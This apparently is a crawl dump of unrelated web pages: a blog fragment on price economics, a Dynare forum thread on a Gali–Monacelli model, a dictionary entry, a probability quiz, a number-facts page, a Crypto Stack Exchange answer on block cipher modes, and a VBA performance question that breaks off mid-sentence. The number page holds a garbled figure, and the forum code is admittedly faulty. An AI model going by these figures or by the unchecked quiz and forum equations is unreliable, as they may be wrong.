equilibrium to reproduce the Econ 101 result that a tax increase reduces demand, you have to assume 1) information transfer is ideal, 2) demand changes slowly, and 3) economic growth ... or instead of 1-3, just assume non-ideal information transfer. Therefore the simplest explanations of the standard Econ 101 impacts of pushing on a price would actually be a decline in real demand or breaking information equilibrium.\n\nThis is not to say these assumptions aren't valid -- they could well be. It's just that there are a lot of assumptions at work whenever anyone tells you what the effects of changing a price are." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88161695,"math_prob":0.99718076,"size":6153,"snap":"2023-40-2023-50","text_gpt3_token_len":1566,"char_repetition_ratio":0.12441047,"word_repetition_ratio":0.01773399,"special_character_ratio":0.27336258,"punctuation_ratio":0.08898305,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99925053,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-11T07:20:06Z\",\"WARC-Record-ID\":\"<urn:uuid:3ab1b88c-821f-44ba-b38c-34a9bcca20b3>\",\"Content-Length\":\"93993\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:18a121b8-fc04-4b5c-83ab-0831b96dc202>\",\"WARC-Concurrent-To\":\"<urn:uuid:d544ad75-2851-45a3-990b-fefb247f4ea2>\",\"WARC-IP-Address\":\"172.253.63.132\",\"WARC-Target-URI\":\"https://informationtransfereconomics.blogspot.com/2016/05/what-happens-when-you-push-on-price.html\",\"WARC-Payload-Digest\":\"sha1:OZ4JA7S6LZBAIOUYGJQRT6OV3LNXKT3W\",\"WARC-Block-Digest\":\"sha1:54QDUW7XCWLDRG3ILQFIS62FRSE6ZIRR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679103558.93_warc_CC-MAIN-20231211045204-20231211075204-00642.warc.gz\"}"}
https://forum.dynare.org/t/gali-and-monacelli-2008/5173
[ "# Gali and Monacelli 2008\n\nHello everybody,\n\nI am trying to replicate “Optimal monetary and fiscal policy in a currency union” by Gali and Monacelli (2008). I am new to Dynare and I do not know how to solve my problem.\n\nI get this error message:\n\nError using print_info (line 80)\nThe steady state contains NaN or Inf\nprint_info(info,options_.noprint, options_);\nError in gali_monacelli_2008 (line 240)\nError in dynare (line 180)\nevalin(‘base’,fname) ;\n\nAttached you find my code.\n\nIt would be great if somebody could help me. Many thanks in advance for your help.\n\nKind regards\ngali_monacelli_2008.mod (6.33 KB)\n\nHello again,\n\nI still have problems with my mod file. I divided the model into two separate mod files, one for the country and one for the currency union, in order to see what is going wrong.\n\nThe currency model is now running, but I cannot figure out my mistake in case of the country model. I tried to use the mod file of Prof. Pfeifer for the Gali and Monacelli (2005) model as a guidance.\n\nAttached you find both mod files.\n\nKind regards\ngali_monacelli_2008_country.mod (4.38 KB)\ngali_monacelli_2008_union.mod (3.41 KB)\n\nAre you sure this split is possible. Shouldn’t there an equation linking the two blocks that will be undetermined when you separate the two?\n\nI tried to simplify the linking equation in order to avoid that problem. Of course, there might be a mistake.\n\nUnfortunately, I still have not managed to get the complete model running. I got rid of some equations, but there is still an error in the system of equations such that dynare cannot find the steady states for the equations 1. - 16. (except 10.).\n\nDo you have any idea how to solve that?\n\nKind regards\ng_m_2008.mod (6.32 KB)\n\nPut\n\nbefore steady to see the residuals of the equations. The problem with Gali’s papers is that some of his linearized equations still contain constant terms and you need to make this consistent. For example,\n\n```rr_star=rho_a+(y_bar_star(+1)-y_bar_star); //9. Union's natural level of interest rate, p.126 ```\nimplies that rr_star has steady state rho_a.\nYou will need something like\n\n```initval; rr_star=rho_a; r_star=rho_a; g_bar_star = log(BigChi); f_gap_star = -log(BigChi); end; ```\nBut this alone will not be sufficient, because I think there is still something wrong with some equations.\n\nDear Mr.Pfeifer,\n\nthank you very much for your help.\n\nWould you be so kind to explain me the meaning of the residuals here? What problems do the constant terms in the linearized equations cause? Is it that I am dividing by zero or something like this?\n\nUnfortunately, I think you are right, there is something wrong with the equations as well…\n\nMerry Christmas and kind regards,\nxyz\n\nThe residuals are the difference between the left and the right side of your equations, given the 0 starting values you provide. They show that some variables are not mean 0. This is per se not a problem in linear models, but you need to take care of this constant term in every equation that is affected.\n\nThank you Mr.Pfeifer. I think, I adjusted my mod file for the constant equations you mnetioned but it is still not working. Can you help me to find the mistake in my equations? I really do not know how to start finding the problem…\n\nThanky you very much in advance.\n\nKind regards\ng_m_2008.mod (6.59 KB)\n\ni rewrite your code after reading the article you referred. And the consequence of code simulation is same as the article.excuse my bad english\nuntitled3.mod (2.22 KB)\n\nDear chowshangyao, thank you very much for your help.\n\nIf I understand it correctly, you implemented the equations describing the optimal policy, right? My problem is, that if I manage to get the baisc model working, I want to add some government debt policies to the model. Thus, I think, I would have to recalculate the optimality conditions, right? In order to avoid that problem, I would like to base my mod-file on the equations describing the economy, and not on the optimality conditions. Does that make sense to you?\n\nDo you have (or anybody else) any suggestions to get my model running? I think, I need to include the monetary union, don’t I ? I would really appreciate any hints or suggestions!\n\nThank you very much in advance.\n\nKind regards\n\ni see what you mean.Some variables like nominal interest_rate and government expenditure are exogenous, optimal condition just determine the unique path for them.So giving any specific path to these exogenous variables can make the basic model working.\n\nback to the topic , i guess some equations like p - p(-1) = ppi make the code cannot work.So i add the risk sharing condition (c = c_star + (1- alpha*s) )into the model for solving the path of domestic consumption c and terms of trade s (As the equilibrium of union is independent to country i ,and the path of y_gap and f_gap ppi can be derived only by using equation(1) phillips curve and (2) Is curve. so the path of y_star c_ star y is known , and we can derive the c and s by using country i’s market clearing and risk sharing condition).\n\nDropping some equations can make it works.But even if i add one equation like p - p(-1) = ppi will also make it unworkable .It troubles me a lot.\nThere also has another thing troubles me that the steady value of some variables which should equal to zero are just close to 0 but not 0.\ng_m_2008.mod (6.52 KB)\n\ni had wrote a polite reply before ,but i forget to login …And it’s already 03:00 am in my country .If there are any inappropriate words ,please forgive me .\n\nDear chowshangyao, thank you very much for working so much on my code. You really helped me a lot as the code is running now.\n\nNonetheless, I do not really understand why these equations cause so much trouble. Does anybody understand this? Unfortunately, I think, the simulations based on your code do not produce the correct impulse response functions, do they? The output gap and the fiscal gap behave in the opposite way…\n\nKind regards\n\nOf course the simulation will be different . Because we define the government expenditure as g_star = BigChi*a_star , but the original(gali(2008) is g_star = log(BigChi) + a_star.\nFrom the original we can see g_gap_star = 0 for all period ,and the fiscal gap will satisfy f_gap_star = - y_gap_star(which can be regarded as the optimal fiscal policy).\nBut our code’s fiscal gap is f_gap_star = (g_star - y_star ) - log(BigChi) = (BigChi-1)*a_star - log(BigChi) - y_gap_star.On the other hand , the exogenous shocks may be badly defined,thus the irf works weirdly.\nFrom above, it’s obvious to see the reason why the consequence of our simulation is different from gali(2008).But i haven’t test it and cannot make sure whether it can be fixed only by modifying the path of government expenditure.\n\nDear chowshangyao,\n\nI adjusted the path for government expenditure to g = log(BigChi)+a (where in the paper do you find this?), and I get g_gap = 0 and f_gap= -y_gap. Thus, I think, this is working now.\nBut looking at the impulse response functions pictured in the paper, this does not seem to hold. There, y_gap initially drops to -0.2 whereas f_gap rises to 2… Is the related to how the shock is specified? The paper simulates a 1 percent rise in productivity. Do you know how to model that?\n\nI have an additional question on modifying the model. Do you think it is possible to implement a debt target and a government spending path to reduce the outstandig debt to that level in order to model a government debt policy (spending cut)?\n\nThank you very much for your help. I am new to dynare and to this kind of models, so I am really greatful for your support.\n\nKind regards\n\n@chowshangyao What is the problem when you add `p - p(-1) = ppi `\n@xyz There is no reason to suppose you cannot add a particular fiscal sector to the model.\n\nDear Mr.Pfeifer,\n\nwhen I add the equation you mentioned, I get the following error message again:\n\nError using print_info (line 80)\nThe steady state contains NaN or Inf\nprint_info(info,options_.noprint, options_);\nError in g_m_2008_2 (line 218)\nError in dynare (line 180)\nevalin(‘base’,fname) ;\n\nI am quite confused about this as I have seen equations like this in other models. Do you why it causes this error in my model?\n\nMoreover, do you know why my impulse response functions differ from the ones presented in the paper? How do I model a 1% shock to technology?\n\nThank you very much for your support.\n\nKind regards\ng_m_2008_2.mod (6.5 KB)\n\n1 Like\n\nThat is because the price level has a unit root and thus infinitely many possible steady states. You cannot endogenously compute it.\n\nFor a 1% technology shocks, set the standard deviation of the TFP shock to 0.01 in the shocks block.\n\nNonetheless, I do not really understand why these equations cause so much trouble. Does anybody understand this? Unfortunately I think, the simulations based on your code do not produce the correct impulse response functions, do they? The output gap and the fiscal gap behave in the opposite way.\n\nAs I said, you cannot try to compute something endogenously from the model when it is not uniquely determined. Only inflation is unique, but not the underlying price level." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9204393,"math_prob":0.76803493,"size":6764,"snap":"2022-05-2022-21","text_gpt3_token_len":1596,"char_repetition_ratio":0.11286982,"word_repetition_ratio":0.11433447,"special_character_ratio":0.23580721,"punctuation_ratio":0.109375,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96192336,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-26T17:53:04Z\",\"WARC-Record-ID\":\"<urn:uuid:c75ba3f9-7407-417c-9e84-62c494570560>\",\"Content-Length\":\"63446\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0457b7a5-f7ad-42b9-bfcc-7c09caf11ed1>\",\"WARC-Concurrent-To\":\"<urn:uuid:19f0c50f-195e-4733-8c1f-09b59c764333>\",\"WARC-IP-Address\":\"217.70.189.83\",\"WARC-Target-URI\":\"https://forum.dynare.org/t/gali-and-monacelli-2008/5173\",\"WARC-Payload-Digest\":\"sha1:JE6U262TKHQDQ3SEINC4E46NRYYJU6HW\",\"WARC-Block-Digest\":\"sha1:O3BFZ6J2L634GMZPXQDF6BWG7OV3MLLJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662619221.81_warc_CC-MAIN-20220526162749-20220526192749-00438.warc.gz\"}"}
https://telecommunication_en_ru.academic.ru/5447/linear_dispersion
[ "# linear dispersion\n\n\nlinear dispersion\nлинейная дисперсия\n\nEnglish-Russian dictionary of telecommunications. 2015.\n\n### Смотреть что такое \"linear dispersion\" в других словарях:\n\n• linear dispersion — tiesinė dispersija statusas T sritis fizika atitikmenys: angl. linear dispersion vok. Lineardispersion, f rus. линейная дисперсия, f pranc. dispersion linéaire, f …   Fizikos terminų žodynas\n\n• Dispersion (water waves) — This article is about dispersion of waves on a water surface. For other forms of dispersion, see Dispersion (disambiguation). In fluid dynamics, dispersion of water waves generally refers to frequency dispersion, which means that waves of… …   Wikipedia\n\n• Dispersion relation — The refraction of a light in a prism is due to dispersion. In physics and electrical engineering, dispersion most often refers to frequency dependent effects in wave propagation. Note, however, that there are several other uses of the word… …   Wikipedia\n\n• dispersion linéaire — tiesinė dispersija statusas T sritis fizika atitikmenys: angl. linear dispersion vok. Lineardispersion, f rus. линейная дисперсия, f pranc. dispersion linéaire, f …   Fizikos terminų žodynas\n\n• Linear regression — Example of simple linear regression, which has one independent variable In statistics, linear regression is an approach to modeling the relationship between a scalar variable y and one or more explanatory variables denoted X. The case of one… …   Wikipedia\n\n• Dispersion (optics) — This article is about dispersion of waves in optics. For other forms of dispersion, see Dispersion (disambiguation). In a prism, material dispersion (a wavelength dependent refractive index) causes different colors to refract at different angles …   Wikipedia\n\n• dispersion — /di sperr zheuhn, sheuhn/, n. 1. Also, dispersal. an act, state, or instance of dispersing or of being dispersed. 2. Optics. a. the variation of the index of refraction of a transparent substance, as glass, with the wavelength of light, with the… …   Universalium\n\n• Linear response function — A linear response function describes the input output relationshipof a signal transducer such as a radio turning electromagnetic waves into musicor a neuron turning synaptic input into a response.Because of its many applications in information… …   Wikipedia\n\n• dispersion, longitudinal —    Process whereby some of the water molecules and solute molecules travel more rapidly than the average linear velocity and some travel more slowly which results in spreading of the solute in the direction of the bulk flow …   Lexicon of Cave and Karst Terminology\n\n• Statistical dispersion — In statistics, statistical dispersion (also called statistical variability or variation) is variability or spread in a variable or a probability distribution. Common examples of measures of statistical dispersion are the variance, standard… …   Wikipedia\n\n• Generalized linear model — In statistics, the generalized linear model (GLM) is a flexible generalization of ordinary least squares regression. It relates the random distribution of the measured variable of the experiment (the distribution function ) to the systematic (non …   Wikipedia\n\n### Книги\n\nWe are using cookies for the best presentation of our site. Continuing to use this site, you agree with this." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7004927,"math_prob":0.90044004,"size":4088,"snap":"2020-10-2020-16","text_gpt3_token_len":924,"char_repetition_ratio":0.1469148,"word_repetition_ratio":0.11643836,"special_character_ratio":0.18468688,"punctuation_ratio":0.115085535,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.976482,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-04T22:58:06Z\",\"WARC-Record-ID\":\"<urn:uuid:bc8c391a-eb54-4459-9c7b-6011840a179f>\",\"Content-Length\":\"51886\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:772dd6ef-d434-460e-a1fe-4458b81dbda7>\",\"WARC-Concurrent-To\":\"<urn:uuid:199b0b07-d3ee-4419-b01a-c3ecc93fcfba>\",\"WARC-IP-Address\":\"95.217.42.33\",\"WARC-Target-URI\":\"https://telecommunication_en_ru.academic.ru/5447/linear_dispersion\",\"WARC-Payload-Digest\":\"sha1:BYVU3AP3PPLWSAY4XBLJND2TJP4KB6JD\",\"WARC-Block-Digest\":\"sha1:ZYFBVTOQNWSZUTJ6SPFFMRT4SVFY3DQ6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370525223.55_warc_CC-MAIN-20200404200523-20200404230523-00078.warc.gz\"}"}
https://dapzoi.com/mathematics-class-12-mcq/probablity-mcq-questions-and-answers
[ "# Probablity MCQ Questions And Answers - Mathematics Class 12\n\nProbablity MCQs : This section focuses on the \"Probablity\" in Mathematics Class 12. These Multiple Choice Questions (MCQs) should be practiced to improve the Mathematics Class 12 skills required for various interviews (campus interview, walk-in interview, company interview), placement, entrance exam and other competitive examinations.\n\nQuestion 1\n\nProbablity equal to the?\n\nA. ratio of the number of favourable results and the total number of input\nB. ratio of the number of favourable outcome and the total number of outcomes\nC. ratio of the number of favourable results and the total number of favourable results\nD. ratio of the number of favourable results and the total number of outcomes\n\nQuestion 2\n\nThe probability formula is defined as the likelihood of an event to happen.\n\nA. Yes\nB. No\nC. Can be yes or no\nD. Can not say\n\nQuestion 3\n\nP(S|F) = P(F|F) = ?\n\nA. 0\nB. 1\nC. infinite\nD. random number\n\nQuestion 4\n\nIf P (A) = 0.8, P (B) = 0.5 and P (B|A) = 0.4, find:P (A ∩ B)\n\nA. 0.64\nB. 0.98\nC. 0.32\nD. 0.4\n\nQuestion 5\n\nP(E|F) = P(E ∩ F)/P(F), provided P(F) can not be?\n\nA. 1\nB. 0\nC. Both A and B\nD. Can not say\n\nQuestion 6\n\nLet A and B be two given events such that P(A) = 0.6, P(B) = 0.2 and P(A/B) = 0.5. Then P(A'/B') is\n\nA. (1/10)\nB. (3/10)\nC. (3/8)\nD. (6/7)\n\nQuestion 7\n\nIf P(A ∩ B) = 70% and P(B) = 85%, then P(A/B) is equal to\n\nA. (14/17)\nB. (17/20)\nC. (7/8)\nD. (1/8)\n\nQuestion 8\n\nTwo dice are thrown once. If it is known that the sum of the numbers on the dice was less than 6 the probability of getting a sum 3 is\n\nA. (1/18)\nB. (5/18)\nC. (2/5)\nD. (1/5)\n\nQuestion 9\n\nThree balls are drawn from a bag containing 2 red and 5 black balls, if the random variable X represents the number of red balls drawn, then X can take values\n\nA. 0,1,2,3\nB. 0,1,2\nC. 0\nD. 1,2" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.847803,"math_prob":0.9938246,"size":1945,"snap":"2022-27-2022-33","text_gpt3_token_len":666,"char_repetition_ratio":0.14270994,"word_repetition_ratio":0.08730159,"special_character_ratio":0.33470437,"punctuation_ratio":0.15757576,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99943423,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-03T15:41:55Z\",\"WARC-Record-ID\":\"<urn:uuid:46cde570-f093-498e-8115-dd48dbfc51a9>\",\"Content-Length\":\"15434\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:76882f98-e4a2-4399-948a-5657d9882c2a>\",\"WARC-Concurrent-To\":\"<urn:uuid:14f93ba9-3f47-4a26-92ab-769b0015191d>\",\"WARC-IP-Address\":\"157.245.101.253\",\"WARC-Target-URI\":\"https://dapzoi.com/mathematics-class-12-mcq/probablity-mcq-questions-and-answers\",\"WARC-Payload-Digest\":\"sha1:IMLSRUGZFX32LTZGENWCGI25GWDHVIDC\",\"WARC-Block-Digest\":\"sha1:KQR5EM4KNEGZQIUTITCRK7VFN3ZLRIPZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104244535.68_warc_CC-MAIN-20220703134535-20220703164535-00097.warc.gz\"}"}
https://metanumbers.com/1024516
[ "1024516 (number)\n\n1,024,516 (one million twenty-four thousand five hundred sixteen) is an even seven-digits composite number following 1024515 and preceding 1024517. In scientific notation, it is written as 1.024516 × 106. The sum of its digits is 19. It has a total of 3 prime factors and 6 positive divisors. There are 512,256 positive integers (up to 1024516) that are relatively prime to 1024516.\n\nBasic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 7\n• Sum of Digits 19\n• Digital Root 1\n\nName\n\nShort name 1 million 24 thousand 516 one million twenty-four thousand five hundred sixteen\n\nNotation\n\nScientific notation 1.024516 × 106 1.024516 × 106\n\nPrime Factorization of 1024516\n\nPrime Factorization 22 × 256129\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 3 Total number of prime factors rad(n) 512258 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 0 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 1,024,516 is 22 × 256129. Since it has a total of 3 prime factors, 1,024,516 is a composite number.\n\nDivisors of 1024516\n\n6 divisors\n\n Even divisors 4 2 2 0\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 6 Total number of the positive divisors of n σ(n) 1.79291e+06 Sum of all the positive divisors of n s(n) 768394 Sum of the proper positive divisors of n A(n) 298818 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 1012.18 Returns the nth root of the product of n divisors H(n) 3.42856 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 1,024,516 can be divided by 6 positive divisors (out of which 4 are even, and 2 are odd). The sum of these divisors (counting 1,024,516) is 1,792,910, the average is 2,988,18.,333.\n\nOther Arithmetic Functions (n = 1024516)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 512256 Total number of positive integers not greater than n that are coprime to n λ(n) 256128 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 80114 Total number of primes less than or equal to n r2(n) 8 The number of ways n can be represented as the sum of 2 squares\n\nThere are 512,256 positive integers (less than 1,024,516) that are coprime with 1,024,516. And there are approximately 80,114 prime numbers less than or equal to 1,024,516.\n\nDivisibility of 1024516\n\n m n mod m 2 3 4 5 6 7 8 9 0 1 0 1 4 3 4 1\n\nThe number 1,024,516 is divisible by 2 and 4.\n\n• Deficient\n\n• Polite\n\nBase conversion (1024516)\n\nBase System Value\n2 Binary 11111010001000000100\n3 Ternary 1221001101001\n4 Quaternary 3322020010\n5 Quinary 230241031\n6 Senary 33543044\n8 Octal 3721004\n10 Decimal 1024516\n12 Duodecimal 414a84\n20 Vigesimal 6815g\n36 Base36 lyis\n\nBasic calculations (n = 1024516)\n\nMultiplication\n\nn×y\n n×2 2049032 3073548 4098064 5122580\n\nDivision\n\nn÷y\n n÷2 512258 341505 256129 204903\n\nExponentiation\n\nny\n n2 1049633034256 1075365837723820096 1101729506601457269473536 1128739507185298595891949208576\n\nNth Root\n\ny√n\n 2√n 1012.18 100.811 31.8148 15.9259\n\n1024516 as geometric shapes\n\nCircle\n\n Diameter 2.04903e+06 6.43722e+06 3.29752e+12\n\nSphere\n\n Volume 4.50448e+18 1.31901e+13 6.43722e+06\n\nSquare\n\nLength = n\n Perimeter 4.09806e+06 1.04963e+12 1.44888e+06\n\nCube\n\nLength = n\n Surface area 6.2978e+12 1.07537e+18 1.77451e+06\n\nEquilateral Triangle\n\nLength = n\n Perimeter 3.07355e+06 4.54504e+11 887257\n\nTriangular Pyramid\n\nLength = n\n Surface area 1.81802e+12 1.26733e+17 836514\n\nCryptographic Hash Functions\n\nmd5 5c4fa352734f57155cf60053cce18043 8644f3592b991dca6cc77ebd1b4fc28666f63252 c5e3521ae55eb78e5c2badcd4806d1ec0aa261c252b14e21d4ce7b720b907164 d5e63367600871a453b3f6428601bcc5bdc1fe3dd0e08886f24b62a8834db53cb7a145e2e21c2c151126738b16dc1a4f4c3b072bc618811592ca1479764e802e 25c46d14ef3b90aa4b3e19e4f0ed1a35b65e0ea6" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6138064,"math_prob":0.99153703,"size":4672,"snap":"2022-05-2022-21","text_gpt3_token_len":1672,"char_repetition_ratio":0.12167952,"word_repetition_ratio":0.028443113,"special_character_ratio":0.47131848,"punctuation_ratio":0.08988764,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99660367,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-28T00:08:29Z\",\"WARC-Record-ID\":\"<urn:uuid:1978a8f5-60af-4a39-a88f-5a43fa876064>\",\"Content-Length\":\"39246\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:13531791-bda6-42ed-b708-28b231c2b58d>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e5c503f-cdf9-4edf-92b8-b49418b32ea1>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/1024516\",\"WARC-Payload-Digest\":\"sha1:FRA5PS6XQKABGCDKZ76MVA767BL64VNS\",\"WARC-Block-Digest\":\"sha1:7UFTB33B35R4F3KIBZUR3IF7V6KOPCCN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320305317.17_warc_CC-MAIN-20220127223432-20220128013432-00642.warc.gz\"}"}
https://crypto.stackexchange.com/questions/24374/why-are-modes-of-operation-used-what-attacks-do-they-prevent
[ "# Why are modes of operation used, what attacks do they prevent?\n\nI know you always need to use a mode of operation when using a block cipher, AES for example, and Wikipedia has a good explanation for what modes of operation are\n\nNow I know if i do not use a mode of operation every time i encrypt the same plain text (abc) with the same key (klm) i get the same cipher text (zyx). the IV in a mode of operation prevents this from happening. But since abc always maps to zyx with the key klm there are some attacks to figure out what key is used.\n\nWhat attacks can be used against only block ciphers?\n\nWhat credible sources explain this?\n\n• Without a mode of operation you can only deterministically encrypt exactly 16 bytes. – CodesInChaos Mar 12 '15 at 10:32\n\nBlock ciphers map bit strings of fixed length to other bit strings of the same length. Hence, using only the block cipher primitive, you can't encrypt more than one block (typically 16 bytes), which is of course undesirable.\n\nThe straight-forward (but bad!) way around this limitation would be to split up the message into chunks of block length and individually encrypt those: this is exactly the description of electronic code book mode (ECB), which is easily seen to be broken under modern security requirements (specifically, it fails indistinguishability under a chosen-plaintext attack since equal plaintext blocks map to equal ciphertext blocks).\n\nHence, other constructions suggest themselves. A good block cipher mode should fulfill at least the following requirements:\n\n• Each block must be encrypted in a different way. Since we want to reuse the same encryption function every time, the variation needs to be introduced somewhere else: For instance, cipher block chaining incorporates the preceding ciphertext block (which is pseudorandom if the cipher is secure) to mask each plaintext block, hence each $$\\mathit{block}$$ is encrypted using the slightly modified cipher $$\\mathit{block}\\mapsto F_k(\\mathit{prev\\_block}\\oplus\\mathit{block})$$, thus satisfying the requirement.\n\nNote that in CBC, the first block has no $$\\mathit{prev\\_block}$$, hence we need to substitute something else for it — this is what is known as an initialization vector (IV). One might be tempted to just use some fixed value, like $$0$$, but this is bad: The first block is not masked, hence an attacker can detect if two messages' prefixes are equal by comparing their corresponding ciphertexts' first blocks. This breaks indistinguishability under a chosen-plaintext attack (for multiple encryptions).\n\n• Encryption must be nondeterministic due to the problem described in the previous paragraph. The easiest way to achieve this for CBC is to just plug in some random value for the IV and transmit it alongside the message. Just like the pseudorandom ciphertext blocks, the randomized IV masks the first plaintext block (and therefore all subsequent since each block depends on its predecessor), hence it hides equal messages and effectively avoids the problems that a fixed IV has.\n\n(Note that while the example describes CBC, about the same arguments could be made for any other block cipher mode.)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8943231,"math_prob":0.89029664,"size":2379,"snap":"2020-45-2020-50","text_gpt3_token_len":473,"char_repetition_ratio":0.12,"word_repetition_ratio":0.005540166,"special_character_ratio":0.19419925,"punctuation_ratio":0.08737864,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9769106,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-05T15:02:35Z\",\"WARC-Record-ID\":\"<urn:uuid:c4aaec0e-4b3c-4645-a129-e1b10bc3a006>\",\"Content-Length\":\"155131\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:111d858d-6487-4be8-8248-0898491ba78d>\",\"WARC-Concurrent-To\":\"<urn:uuid:ae0853eb-89fb-4e7f-bb56-5d1e92d30802>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://crypto.stackexchange.com/questions/24374/why-are-modes-of-operation-used-what-attacks-do-they-prevent\",\"WARC-Payload-Digest\":\"sha1:W66XISK7V5EUSPRJWYFWKQFOLKDTCZIY\",\"WARC-Block-Digest\":\"sha1:SRBALQNW36V22226VABCEIZE3S7UQF7D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141747887.95_warc_CC-MAIN-20201205135106-20201205165106-00714.warc.gz\"}"}
https://codereview.stackexchange.com/questions/60323/inefficient-slow-loop-with-calculations-in-worksheet/60331
[ "# Inefficient (slow) loop with calculations in worksheet\n\nI am looking for best practice help. Slow loops seem to be a recurring problem for me and I'd like to learn a better way. The code itself works as it should, except it is far too slow.\n\nThe problem is the worksheet needs to calculate after each B & i value is dropped into \"N13\" so that \"U12\", \"V12\", and \"W12\" update before being deposited into wsRepository. If I turn Calculation on Manual then my values are no good because they are contingent upon the other worksheet formulas updating (calculating). I think I can copy my worksheets \"off-screen\", calculate, and then paste my values back \"on-screen\", but I am not sure how to do this. I've used variants in the paste to do similar things, but I not comfortable with them. There may even be more efficient ways of achieving my desired result that I am unaware of.\n\nApplication.ScreenUpdating = False\n\nDim wsRepository As Worksheet\nDim wsInput As Worksheet\nDim i As Integer\n\nSet wsRepository = ThisWorkbook.Sheets(\"Repository\")\nSet wsInput = ThisWorkbook.Sheets(\"Input\")\n\nFor i = 4 To 2004\n\nwsInput.Range(\"N13\").Value = wsRepository.Range(\"B\" & i).Value\n\n'copy back amounts\nwsRepository.Range(\"E\" & i).Value = wsInput.Range(\"U12\").Value\nwsRepository.Range(\"C\" & i).Value = wsInput.Range(\"V12\").Value\nwsRepository.Range(\"D\" & i).Value = wsInput.Range(\"W12\").Value\n\nNext i\n\nwsInput.Activate\n\n• How complicated are the formulas in U12, etc.? Can you share them? It would be easier to help if you can. Aug 17, 2014 at 23:02\n\nApplication.ScreenUpdating = False\n\n\nI find it scary that the corresponding = True is nowhere in your code, for reasons already mentioned. Whenever I turn off screen updating, I find it's good UX to also specify a status bar message, and change the mouse cursor to a hourglass. Something along these lines:\n\nPublic Sub ToggleWaitMode(Optional ByVal waitMode As Boolean = False)\nApplication.ScreenUpdating = waitMode\nApplication.Calculation = IIf(waitMode, xlCalculationManual, xlCalculationAutomatic)\nApplication.StatusBar = IIf(waitMode, \"Please wait...\", vbNullString)\nApplication.Cursor = IIf(waitMode, xlWait, xlDefault)\nEnd Sub\n\n\nWhich makes your procedure stub look like this:\n\nOption Explicit\n\nPublic Sub DoSomething()\nOn Error GoTo ErrHandler\nToggleWaitMode True\n\n'do that thing\n\nCleanExit:\nIf Not Application.ScreenUpdating Then ToggleWaitMode\nExit Sub\nErrHandler:\nToggleWaitMode\n' handle errors here\nResume CleanExit\nEnd Sub\n\n\nIf I turn Calculation on Manual then my values are no good because...\n\nIf I understand properly, you need to update $N$13 some 2,000 times with a value that's in \"$B$\" & i, and then I guess $U$12, $V$12 and $W$12 need to be recalculated accordingly.\n\nYou haven't shown us what these cells contain and what cells their formula is referring to, but if they're the only cells that need to be recalculated when $N$13 changes, then you can 